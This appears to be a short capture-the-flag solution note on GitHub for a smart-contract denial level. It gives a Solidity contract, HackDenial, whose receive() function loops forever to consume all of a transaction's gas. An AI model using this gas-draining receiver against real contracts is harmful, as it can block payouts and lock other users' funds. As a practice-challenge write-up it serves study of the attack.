Skip to content

Latest commit

 

History

History
9 lines (8 loc) · 145 Bytes

20-denial.md

File metadata and controls

9 lines (8 loc) · 145 Bytes

use a contract that consumes all the gas of the tx

contract HackDenial {
    receive() external payable {
        while(true){}
    }
}